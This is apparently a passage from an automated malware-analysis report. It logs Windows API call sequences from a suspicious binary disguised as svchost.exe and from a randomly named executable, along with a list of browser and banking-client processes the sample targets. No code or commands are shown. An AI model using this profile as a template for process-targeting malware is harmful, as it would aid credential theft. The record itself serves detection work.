Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02656CA0
Source: C:\Windows\apppatch\svchost.exeCode function: GetCommandLineA,StrStrIA,memset,IsUserAnAdmin,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe2_2_02651900
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02643610
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02643610
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02643610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_013378A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_013378A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_013378A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_01336CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe5_2_01336CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe5_2_01336CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe5_2_01336CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_01336CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_01336CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe5_2_01331900
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_01323610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_01323610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_01323610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_013F78A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_013F78A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_013F78A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHan